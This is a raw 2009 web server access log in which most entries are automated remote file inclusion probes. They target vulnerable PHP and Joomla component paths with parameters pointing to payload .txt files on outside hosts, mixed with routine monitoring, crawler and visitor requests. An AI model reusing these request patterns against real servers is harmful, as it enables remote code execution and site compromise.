65.254.216.47 - - [22/Jun/2009:01:01:00 -0400] "GET /logs//admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
65.254.216.47 - - [22/Jun/2009:01:01:00 -0400] "GET //admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
65.254.216.47 - - [22/Jun/2009:01:01:01 -0400] "GET /logs/access_log.Q109052100//admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
121.165.73.157 - - [22/Jun/2009:01:01:03 -0400] "GET /logs/access_log.Q109052900/index.php?configFile=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
121.165.73.157 - - [22/Jun/2009:01:01:03 -0400] "GET /index.php?configFile=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
121.165.73.157 - - [22/Jun/2009:01:01:03 -0400] "GET /logs/index.php?configFile=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
208.111.94.201 - - [22/Jun/2009:01:01:03 -0400] "GET /logs/access_log.Q109051500%20%20//modules//xoopsgallery/check_init.php?GALLERY_BASEDIR=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:01:01:05 -0400] "GET /logs/access_log.Q109051600%20%20//modules//xoopsgallery/check_init.php?GALLERY_BASEDIR=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
65.254.216.47 - - [22/Jun/2009:01:01:06 -0400] "GET //admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
65.254.216.47 - - [22/Jun/2009:01:01:06 -0400] "GET /logs//admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
65.254.216.47 - - [22/Jun/2009:01:01:07 -0400] "GET /logs/access_log.Q109052100//admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
65.254.216.47 - - [22/Jun/2009:01:01:25 -0400] "GET /logs/access_log.Q109053000//admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
65.254.216.47 - - [22/Jun/2009:01:01:27 -0400] "GET /logs/access_log.Q109053000//admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
65.254.216.47 - - [22/Jun/2009:01:01:31 -0400] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
65.254.216.47 - - [22/Jun/2009:01:01:31 -0400] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
65.254.216.47 - - [22/Jun/2009:01:01:31 -0400] "GET /logs/access_log.Q109052100//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
65.254.216.47 - - [22/Jun/2009:01:01:31 -0400] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
65.254.216.47 - - [22/Jun/2009:01:01:31 -0400] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
65.254.216.47 - - [22/Jun/2009:01:01:31 -0400] "GET /logs/access_log.Q109052100//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
65.254.216.47 - - [22/Jun/2009:01:01:32 -0400] "GET /logs/access_log.Q109053000//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
65.254.216.47 - - [22/Jun/2009:01:01:34 -0400] "GET /logs/access_log.Q109053000//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
208.116.37.152 - - [22/Jun/2009:01:01:39 -0400] "GET /logs/access_log.Q109052100//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
208.116.37.152 - - [22/Jun/2009:01:01:39 -0400] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
208.116.37.152 - - [22/Jun/2009:01:01:39 -0400] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
208.116.37.152 - - [22/Jun/2009:01:01:39 -0400] "GET /logs/access_log.Q109053000//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
121.165.73.157 - - [22/Jun/2009:01:01:56 -0400] "GET /logs/error_log.Q109052900/index.php?configFile=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
203.94.155.59 - - [22/Jun/2009:01:02:07 -0400] "GET /logs/access_log.Q109061200/send_reminders.php?includedir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
217.70.32.2 - - [22/Jun/2009:01:02:08 -0400] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
217.70.32.2 - - [22/Jun/2009:01:02:08 -0400] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
217.70.32.2 - - [22/Jun/2009:01:02:08 -0400] "GET /logs/access_log.Q109052100//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
208.116.37.152 - - [22/Jun/2009:01:02:09 -0400] "GET //admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
208.116.37.152 - - [22/Jun/2009:01:02:09 -0400] "GET /logs/access_log.Q109052100//admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
208.116.37.152 - - [22/Jun/2009:01:02:09 -0400] "GET /logs//admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
217.70.32.2 - - [22/Jun/2009:01:02:10 -0400] "GET /logs/access_log.Q109053000//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
208.116.37.152 - - [22/Jun/2009:01:02:30 -0400] "GET /logs/access_log.Q109053000//admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:01:02:55 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:01:02:55 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:01:02:56 -0400] "GET /logs/access_log.Q109061800%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
217.70.32.2 - - [22/Jun/2009:01:03:12 -0400] "GET //admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
217.70.32.2 - - [22/Jun/2009:01:03:12 -0400] "GET /logs//admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
217.70.32.2 - - [22/Jun/2009:01:03:12 -0400] "GET /logs/access_log.Q109052100//admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
65.254.216.47 - - [22/Jun/2009:01:03:19 -0400] "GET /logs/access_log.Q109053000%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
65.254.216.47 - - [22/Jun/2009:01:03:19 -0400] "GET /logs/access_log.Q109052100%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
65.254.216.47 - - [22/Jun/2009:01:03:23 -0400] "GET /logs/access_log.Q109052100%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
65.254.216.47 - - [22/Jun/2009:01:03:23 -0400] "GET /logs/access_log.Q109053000%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
65.254.216.47 - - [22/Jun/2009:01:03:24 -0400] "GET /logs/access_log.Q109052100%20%20//admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
82.194.87.219 - - [22/Jun/2009:01:03:27 -0400] "GET /logs//errors.php?error=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 214 "-" "libwww-perl/5.822"
82.194.87.219 - - [22/Jun/2009:01:03:30 -0400] "GET /logs///components/com_simpleboard/image_upload.php?sbp=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 248 "-" "libwww-perl/5.822"
65.254.216.47 - - [22/Jun/2009:01:03:31 -0400] "GET /logs/access_log.Q109053000%20%20//admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
217.70.32.2 - - [22/Jun/2009:01:03:34 -0400] "GET /logs/access_log.Q109053000//admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
208.116.37.152 - - [22/Jun/2009:01:03:46 -0400] "GET /logs/access_log.Q109053000%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
208.116.37.152 - - [22/Jun/2009:01:03:46 -0400] "GET /logs/access_log.Q109052100%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
65.254.216.47 - - [22/Jun/2009:01:03:56 -0400] "GET /logs/access_log.Q109052100%20%20//admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
65.254.216.47 - - [22/Jun/2009:01:04:05 -0400] "GET /logs/access_log.Q109053000%20%20//admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
81.177.9.20 - - [22/Jun/2009:01:04:10 -0400] "GET /logs/access_log.Q109052100//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
81.177.9.20 - - [22/Jun/2009:01:04:12 -0400] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
81.177.9.20 - - [22/Jun/2009:01:04:14 -0400] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
81.177.9.20 - - [22/Jun/2009:01:04:19 -0400] "GET /logs/access_log.Q109053000//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:01:05:01 -0400] "GET /logs/error_log.Q109061500%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:01:05:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
208.116.37.152 - - [22/Jun/2009:01:05:46 -0400] "GET /logs/access_log.Q109052100%20%20//admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:01:05:48 -0400] "GET /logs/access_log.Q109061800//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
208.116.37.152 - - [22/Jun/2009:01:05:58 -0400] "GET /logs/access_log.Q109053000%20%20//admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:01:06:33 -0400] "GET /logs/error_log.Q109061500//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
81.177.9.20 - - [22/Jun/2009:01:06:47 -0400] "GET //admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
81.177.9.20 - - [22/Jun/2009:01:06:47 -0400] "GET /logs//admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
81.177.9.20 - - [22/Jun/2009:01:06:49 -0400] "GET /logs/access_log.Q109052100//admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
81.177.9.20 - - [22/Jun/2009:01:07:10 -0400] "GET /logs/access_log.Q109053000//admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
217.70.32.2 - - [22/Jun/2009:01:07:25 -0400] "GET /logs/access_log.Q109051500%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
121.15.254.22 - - [22/Jun/2009:01:07:26 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
121.15.254.22 - - [22/Jun/2009:01:07:26 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
121.15.254.22 - - [22/Jun/2009:01:07:26 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
61.250.85.185 - - [22/Jun/2009:01:07:29 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
61.250.85.185 - - [22/Jun/2009:01:07:29 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 209 "-" "libwww-perl/5.79"
217.70.32.2 - - [22/Jun/2009:01:07:29 -0400] "GET /logs/error_log.Q109051500%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
61.250.85.185 - - [22/Jun/2009:01:07:30 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 214 "-" "libwww-perl/5.79"
201.232.54.48 - - [22/Jun/2009:01:07:31 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kudacuki.ucoz.com/CHID.txt%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
201.232.54.48 - - [22/Jun/2009:01:07:31 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kudacuki.ucoz.com/CHID.txt%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
201.232.54.48 - - [22/Jun/2009:01:07:31 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kudacuki.ucoz.com/CHID.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
201.232.54.48 - - [22/Jun/2009:01:07:33 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kudacuki.ucoz.com/CHID.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
201.232.54.48 - - [22/Jun/2009:01:07:33 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kudacuki.ucoz.com/CHID.txt%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
201.232.54.48 - - [22/Jun/2009:01:07:33 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kudacuki.ucoz.com/CHID.txt%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
201.232.54.48 - - [22/Jun/2009:01:07:47 -0400] "GET /logs/access_log.Q109051700//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kudacuki.ucoz.com/CHID.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
201.232.54.48 - - [22/Jun/2009:01:07:58 -0400] "GET /logs/access_log.Q109051700//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kudacuki.ucoz.com/CHID.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
82.194.87.219 - - [22/Jun/2009:01:08:00 -0400] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 243 "-" "libwww-perl/5.822"
61.250.85.185 - - [22/Jun/2009:01:08:16 -0400] "GET /logs/access_log.Q109060900//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
121.15.254.22 - - [22/Jun/2009:01:08:22 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:01:08:24 -0400] "GET /logs/access_log.Q109061500//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
201.232.54.48 - - [22/Jun/2009:01:08:44 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://kudacuki.ucoz.com/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
201.232.54.48 - - [22/Jun/2009:01:08:44 -0400] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://kudacuki.ucoz.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
201.232.54.48 - - [22/Jun/2009:01:08:44 -0400] "GET /logs/access_log.Q109051800%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://kudacuki.ucoz.com/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
201.232.54.48 - - [22/Jun/2009:01:08:44 -0400] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://kudacuki.ucoz.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
201.232.54.48 - - [22/Jun/2009:01:08:53 -0400] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://kudacuki.ucoz.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
201.232.54.48 - - [22/Jun/2009:01:08:53 -0400] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://kudacuki.ucoz.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
201.232.54.48 - - [22/Jun/2009:01:08:53 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://kudacuki.ucoz.com/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
201.232.54.48 - - [22/Jun/2009:01:08:56 -0400] "GET /logs/access_log.Q109051800%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://kudacuki.ucoz.com/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
81.177.9.20 - - [22/Jun/2009:01:09:11 -0400] "GET /logs/access_log.Q109053000%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
81.177.9.20 - - [22/Jun/2009:01:09:11 -0400] "GET /logs/access_log.Q109052100%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
217.70.32.2 - - [22/Jun/2009:01:10:02 -0400] "GET /logs/access_log.Q109053000%20%20//admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
217.70.32.2 - - [22/Jun/2009:01:10:02 -0400] "GET /logs/access_log.Q109052100%20%20//admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:01:10:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.54 - - [22/Jun/2009:01:12:54 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Googlebot-Image/1.0"
66.249.71.54 - - [22/Jun/2009:01:12:54 -0400] "GET /images/download_sell_miss_sm.jpg HTTP/1.1" 200 4062 "-" "Googlebot-Image/1.0"
213.234.216.82 - - [22/Jun/2009:01:14:04 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/errore.txt?? HTTP/1.1" 200 453 "-" "libwww-perl/5.75"
213.234.216.82 - - [22/Jun/2009:01:14:04 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/errore.txt?? HTTP/1.1" 200 6516 "-" "libwww-perl/5.75"
213.234.216.82 - - [22/Jun/2009:01:14:04 -0400] "GET /logs/access_log.Q109050700///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/errore.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.75"
81.177.9.20 - - [22/Jun/2009:01:14:12 -0400] "GET /logs/access_log.Q109052100%20%20//admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
81.177.9.20 - - [22/Jun/2009:01:14:20 -0400] "GET /logs/access_log.Q109053000%20%20//admin.cropcanvas.php?cropimagedir=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
201.232.54.48 - - [22/Jun/2009:01:14:21 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://kudacuki.ucoz.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.232.54.48 - - [22/Jun/2009:01:14:21 -0400] "GET /logs/access_log.Q109051800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://kudacuki.ucoz.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.234.216.82 - - [22/Jun/2009:01:14:32 -0400] "GET /logs/error_log.Q109050700///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/errore.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.75"
209.59.12.99 - - [22/Jun/2009:01:15:14 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
95.211.85.68 - - [22/Jun/2009:01:15:48 -0400] "GET /?sourcedir=http://www.unreals.co.cc/v7.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.826"
95.211.85.68 - - [22/Jun/2009:01:15:48 -0400] "GET /logs/?sourcedir=http://www.unreals.co.cc/v7.txt??? HTTP/1.1" 200 6510 "-" "libwww-perl/5.826"
95.211.85.68 - - [22/Jun/2009:01:15:48 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.unreals.co.cc/v7.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.826"
95.211.85.68 - - [22/Jun/2009:01:15:49 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.unreals.co.cc/v7.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.826"
98.232.50.87 - - [22/Jun/2009:01:15:56 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; .NET CLR 1.1.4322)"
98.232.50.87 - - [22/Jun/2009:01:15:56 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; .NET CLR 1.1.4322)"
98.232.50.87 - - [22/Jun/2009:01:15:59 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; .NET CLR 1.1.4322)"
98.232.50.87 - - [22/Jun/2009:01:15:59 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; .NET CLR 1.1.4322)"
211.230.156.161 - - [22/Jun/2009:01:19:29 -0400] "GET /littleshell.shtm=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.79"
